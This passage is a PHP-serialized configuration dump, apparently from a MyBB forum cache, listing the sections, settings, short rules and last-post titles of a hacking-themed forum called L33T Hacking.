de\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:22;a:37:{s:3:\"fid\";s:2:\"22\";s:4:\"name\";s:8:\"Whitehat\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"22\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:26;a:37:{s:3:\"fid\";s:2:\"26\";s:4:\"name\";s:9:\"LH Elite \";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"26\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:31;a:37:{s:3:\"fid\";s:2:\"31\";s:4:\"name\";s:8:\"Upgraded\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"31\";s:9:\"disporder\";s:1:\"7\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:57;a:37:{s:3:\"fid\";s:2:\"57\";s:4:\"name\";s:7:\"Groups \";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"57\";s:9:\"disporder\";s:1:\"8\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:70;a:37:{s:3:\"fid\";s:2:\"70\";s:4:\"name\";s:6:\"Gaming\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"70\";s:9:\"disporder\";s:1:\"9\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:32;a:37:{s:3:\"fid\";s:2:\"32\";s:4:\"name\";s:10:\"GFX Corner\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"32\";s:9:\"disporder\";s:2:\"10\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:36;a:37:{s:3:\"fid\";s:2:\"36\";s:4:\"name\";s:11:\"Marketplace\";s:11:\"description\";s:0:\"\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"c\";s:3:\"pid\";s:1:\"0\";s:10:\"parentlist\";s:2:\"36\";s:9:\"disporder\";s:2:\"11\";s:6:\"active\";s:1:\"0\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"shim.gif\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:3;a:37:{s:3:\"fid\";s:1:\"3\";s:4:\"name\";s:45:\"Announcements, Feedback, Bugs and Suggestions\";s:11:\"description\";s:135:\"This is the section where LH staff announce new rules, people can suggest new ideas, report bugs & issues and leave your feedback here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:3:\"1,3\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:18:\"CloudFlare Issues?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:22:\"Rules for this section\";s:5:\"rules\";s:253:\"1. Only Announcements by Mods and Staff are posted here, member announcements go in the Off Topic section.\r\n2. You are allowed to post your feedbacks and report site bugs here.\r\n3. We have a separate section for member and staff reports and suggestions.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:28:\"1339992119_announcements.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:4;a:37:{s:3:\"fid\";s:1:\"4\";s:4:\"name\";s:12:\"Introduction\";s:11:\"description\";s:71:\"New to LH? Introduce yourself to other members and get to know others. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:3:\"1,4\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:8:\"Wasssup?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:23:\"1339992017_Positive.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:5;a:37:{s:3:\"fid\";s:1:\"5\";s:4:\"name\";s:5:\"Staff\";s:11:\"description\";s:40:\"Private forum for all staff discussions.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:3:\"1,5\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:20:\"Request for LH staff\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:21:\"1339992183_client.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:48;a:37:{s:3:\"fid\";s:2:\"48\";s:4:\"name\";s:4:\"Mod \";s:11:\"description\";s:73:\"A section for Mod discussions. Only Mods and Admins can view this forum. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:4:\"1,48\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"61\";s:15:\"lastpostsubject\";s:23:\"We have a problem here.\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"watchman.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:19;a:37:{s:3:\"fid\";s:2:\"19\";s:4:\"name\";s:4:\"Junk\";s:11:\"description\";s:35:\"A section for all unwanted threads.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:4:\"1,19\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:40:\"[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"trash_full.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:50;a:37:{s:3:\"fid\";s:2:\"50\";s:4:\"name\";s:17:\"Private Inquiries\";s:11:\"description\";s:103:\"Have a complaint against someone? Need to report a valid rep abuse? You can only view your own threads.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"3\";s:10:\"parentlist\";s:6:\"1,3,50\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:23:\"Report against a thread\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:713:\"This forum allows you to talk privately with staff about any issues you have relating to the forum:\r\n
\r\nThe following topics for example should be posted here:\r\n\r\nPlease do not post the following topics:\r\n\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"flag_red.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:49;a:37:{s:3:\"fid\";s:2:\"49\";s:4:\"name\";s:21:\"Suggestions and Ideas\";s:11:\"description\";s:101:\"Have a new Idea? Want to help us improve L33T Hacking? Post all your suggestions and new ideas here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"3\";s:10:\"parentlist\";s:6:\"1,3,49\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"53\";s:15:\"lastpostsubject\";s:26:\"[Suggestion] Post cooldown\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:18:\"Light Bulb Off.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:2;a:37:{s:3:\"fid\";s:1:\"2\";s:4:\"name\";s:4:\"Test\";s:11:\"description\";s:32:\"For staff to test new features. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"5\";s:10:\"parentlist\";s:5:\"1,5,2\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"61\";s:15:\"lastpostsubject\";s:7:\"dkdadwa\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:20:\"1339992224_tests.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:7;a:37:{s:3:\"fid\";s:1:\"7\";s:4:\"name\";s:9:\"Off Topic\";s:11:\"description\";s:97:\"All discussions non-relating hacking are allowed in this section. Trolling will not be tolerated.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:3:\"6,7\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"53\";s:15:\"lastpostsubject\";s:22:\"Who\'s had a Toothache?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"2\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:60:\"1. No trolling\r\n2. No donation begging\r\n3. This is not 4chan\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"1339992294_sofa.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:42;a:37:{s:3:\"fid\";s:2:\"42\";s:4:\"name\";s:18:\"News and Happening\";s:11:\"description\";s:49:\"Find out the latest buzz around the around here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:4:\"6,42\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"262\";s:15:\"lastpostsubject\";s:36:\"Marijuana legalized in two US states\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"news2.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:47;a:37:{s:3:\"fid\";s:2:\"47\";s:4:\"name\";s:29:\"Member Contests and Giveaways\";s:11:\"description\";s:125:\"All giveaways and member contests will be held here. There will not be any official contests so participate at your own risk!\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:4:\"6,47\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:26:\"Premium Minecraft 